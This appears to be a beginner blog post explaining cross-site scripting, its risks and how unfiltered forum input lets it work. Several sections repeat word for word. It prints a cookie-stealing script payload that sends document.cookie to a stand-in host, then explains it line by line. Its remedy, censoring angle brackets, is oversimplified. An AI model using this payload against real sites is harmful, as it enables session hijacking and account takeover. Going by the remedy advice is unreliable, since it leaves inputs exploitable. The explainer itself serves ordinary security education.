Odds of you getting hacked are worse than a fair coin toss.
According to Research Gate, 65% of websites are vulnerable to easily exploitable vulnerability known as XSS.
What is XSS?
XSS stands for Cross Site Scripting. It is a type of web vulnerability, where an attacker can trick your browser into running arbitrary code while thinking it comes from the original, vulnerable website.
What's the risk?
While what I described above may not seem that bad, it can trick your browser into sending one-time ID codes known as Session ID Cookies to the attacker, allowing them to login into your account and do what they want. A more basic attack maybe using your computer's processing power for selfish purposes, i.e. Crypto mining. XSS can also be used to redirect you to a phishing page even if you type the URL correctly, or even redirect your credentials from the authentic login page to a phishing one. A more benevolent way of using an XSS vulnerability would be to inject code that auto upvotes your post.
What is XSS?
XSS stands for Cross Site Scripting. It is a type of web vulnerability, where an attacker can trick your browser into running arbitrary code while thinking it comes from the original, vulnerable website.
What's the risk?
While what I described above may not seem that bad, it can trick your browser into sending one-time ID codes known as Session ID Cookies to the attacker, allowing them to login into your account and do what they want. A more basic attack maybe using your computer's processing power for selfish purposes, i.e. Crypto mining. XSS can also be used to redirect you to a phishing page even if you type the URL correctly, or even redirect your credentials from the authentic login page to a phishing one. A more benevolent way of using an XSS vulnerability would be to inject code that auto upvotes your post.
How does it work?
XSS happens when a server displays user input with no filters on a webpage. For example, imagine a forum, where users can post whatever they want. These days webpages are organized in blocks. For example, everything between <h1> and </h1> is a nice, big heading. However, there is a special type of block:
<script>code goes here</script>
Which tells the browser to execute code inside of it. In an ideal world, users would not be able to use these webpage blocks in their forum posts, and could only send plain text.
But we don't live in an ideal world.
A careless admin could forget about the fact that these blocks will be treated as code and not censor them, which would mean arbitrary code could be run in user's web browsers. In our previous forum example, let's say that a malicious actor posts the following comment:
<script>location.replace("https://example.com/stealcookie.php?cookie="+document.cookie)</script>
HUH?? What does all that gibberish mean? Well, let's break it down:
<script>: Interpret everything from here as code until you see </script>
Location.replace("url goes here"): redirects the user to the URL between the quotes
https://example.com/stealcookie.php?cookie= the cookie stealer's URL
Document.cookie: user's preferences, and, more importantly, the one-time Session ID I mentioned earlier!
</script>: Code block is finished.
The cookie stealer would log the cookie sent to it, and, to be more stealthy, redirect the user back to the forum page. The result of this is that the users ID has been leaked, and the hacker can login. In fact, if the user in question is the admin, the admin account gets hacked!
XSS happens when a server displays user input with no filters on a webpage. For example, imagine a forum, where users can post whatever they want. These days webpages are organized in blocks. For example, everything between <h1> and </h1> is a nice, big heading. However, there is a special type of block:
<script>code goes here</script>
Which tells the browser to execute code inside of it. In an ideal world, users would not be able to use these webpage blocks in their forum posts, and could only send plain text.
But we don't live in an ideal world.
A careless admin could forget about the fact that these blocks will be treated as code and not censor them, which would mean arbitrary code could be run in user's web browsers. In our previous forum example, let's say that a malicious actor posts the following comment:
<script>location.replace("https://example.com/stealcookie.php?cookie="+document.cookie)</script>
HUH?? What does all that gibberish mean? Well, let's break it down:
<script>: Interpret everything from here as code until you see </script>
Location.replace("url goes here"): redirects the user to the URL between the quotes
https://example.com/stealcookie.php?cookie= the cookie stealer's URL
Document.cookie: user's preferences, and, more importantly, the one-time Session ID I mentioned earlier!
</script>: Code block is finished.
The cookie stealer would log the cookie sent to it, and, to be more stealthy, redirect the user back to the forum page. The result of this is that the users ID has been leaked, and the hacker can login. In fact, if the user in question is the admin, the admin account gets hacked!
Is there a remedy?
Ok. So it's not as bad as it sounds, as this vulnerability is around 25 years old, and people learn. Right? Sort of. Beginners make this mistake to this day, but giants like Google are pretty much immune. Probably. You see, bare bones protection is easy. Just censor the angle brackets. But when you're as big as Google, with thousands of potentially exploitable inputs, I wouldn't be surprised if, somewhere in there, an XSS vuln still lurks...
Ok. So it's not as bad as it sounds, as this vulnerability is around 25 years old, and people learn. Right? Sort of. Beginners make this mistake to this day, but giants like Google are pretty much immune. Probably. You see, bare bones protection is easy. Just censor the angle brackets. But when you're as big as Google, with thousands of potentially exploitable inputs, I wouldn't be surprised if, somewhere in there, an XSS vuln still lurks...